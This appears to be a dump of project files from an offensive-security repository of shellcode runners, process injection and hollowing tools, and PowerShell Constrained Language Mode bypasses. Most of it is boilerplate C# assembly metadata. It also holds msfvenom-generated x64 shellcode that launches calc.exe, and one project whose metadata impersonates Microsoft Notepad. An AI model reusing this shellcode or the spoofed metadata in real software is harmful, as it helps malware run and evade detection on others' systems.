2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ShellcodeRunner_Caesar")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ShellcodeRunner_Caesar")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("50b568d7-3cda-4586-8bc8-8f4047c726e5")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner_ExNuma/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ShellcodeRunner_ExNuma")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ShellcodeRunner_ExNuma")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("501ba458-d1c3-4f47-8d00-7f5bbaea3a28")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PSLangBypass")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PSLangBypass")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("c10f38a5-fe8e-4d99-aa8b-240f935778e5")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_VirtualAlloc/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DInvoke_VirtualAlloc")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DInvoke_VirtualAlloc")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("d6b0330c-55ef-4ee1-b698-2a5177947e9b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeBuilder_Caesar/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ShellcodeBuilder_Caesar")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ShellcodeBuilder_Caesar")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("50b568d7-3cda-4586-8bc8-8f4047c726e5")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/PS_Reflective_DLL_Inject/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PS_Reflective_DLL_Inject")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PS_Reflective_DLL_Inject")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("2afd92e8-1410-4c6d-9e33-1b80dad8cbe8")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/PS_Reflective_XOR_Builder/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PS_Reflective_XOR_Builder")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PS_Reflective_XOR_Builder")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("bbf3e552-7410-4ca2-ad21-4c2c2b5a48d3")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass_SpawnShell/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PSLangBypass_SpawnShell")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PSLangBypass_SpawnShell")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("9c213991-b733-4907-be3f-03d8317ade11")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/shellcodes/Calc/calc-64.txt:
--------------------------------------------------------------------------------
1 | $ msfvenom -p windows/x64/exec cmd="calc.exe" -f c
2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
3 | [-] No arch selected, selecting arch: x64 from the payload
4 | No encoder specified, outputting raw payload
5 | Payload size: 276 bytes
6 | Final size of c file: 1185 bytes
7 | unsigned char buf[] =
8 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
9 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
10 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
11 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
12 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
13 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
14 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
15 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
16 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
17 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
18 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
19 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
20 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
21 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
22 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
23 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
24 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
25 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
26 | "\x63\x2e\x65\x78\x65\x00";
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_MapViewOfSection/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DInvoke_MapViewOfSection")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DInvoke_MapViewOfSection")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("0fa83ecd-56dd-4fe7-bf6e-e13f5aefc84b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_ProcessHollowing/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DInvoke_ProcessHollowing")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DInvoke_ProcessHollowing")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("3a5b1fc9-2ed3-49c2-9ec0-9ca3a870f2d2")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_ProcessInjection/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DInvoke_ProcessInjection")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DInvoke_ProcessInjection")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("59e7bc8e-7ac5-4393-ae49-4a4af40ed1a5")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DLL_Shellcode_Runner_Caesar/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DLL_Shellcode_Runner_Caesar")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DLL_Shellcode_Runner_Caesar")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("6cf52967-b154-4592-9370-bfefd78cbdf8")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/EnumSystemCodePagesA_SC_Runner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Notepad")]
9 | [assembly: AssemblyDescription("Notepad")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("Microsoft Corporation")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("67ed8f5f-62bc-4fa3-b6d1-00b5a29c9da3")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("10.0.19041.1320")]
36 | [assembly: AssemblyFileVersion("10.0.19041.1320")]
37 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeBuilder_VBA_Caesar/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ShellcodeBuilder_VBA_Caesar")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ShellcodeBuilder_VBA_Caesar")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("00d1ad9c-f443-4ff1-b2bf-acb805f39f7f")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/shellcodes/Calc/calc-64-thread.txt:
--------------------------------------------------------------------------------
1 | $ msfvenom -p windows/x64/exec cmd="calc.exe" exitfunc=thread -f c
2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
3 | [-] No arch selected, selecting arch: x64 from the payload
4 | No encoder specified, outputting raw payload
5 | Payload size: 276 bytes
6 | Final size of c file: 1185 bytes
7 | unsigned char buf[] =
8 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
9 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
10 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
11 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
12 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
13 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
14 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
15 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
16 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
17 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
18 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
19 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
20 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
21 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
22 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
23 | "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
24 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
25 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
26 | "\x63\x2e\x65\x78\x65\x00";
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner_Caesar_ExNuma/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ShellcodeRunner_Caesar_ExNuma")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ShellcodeRunner_Caesar_ExNuma")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("1d459c1a-ce23-456c-bc05-bcb698df38db")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass_InstallUtil/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Powershell_CLM_Bypass_InstallUtil")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Powershell_CLM_Bypass_InstallUtil")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("2357ff3b-8147-4b9a-9e33-a4c0e2cdebda")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass_InstallUtil_Bypass/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PSLangBypass_InstallUtil_Bypass")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PSLangBypass_InstallUtil_Bypass")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
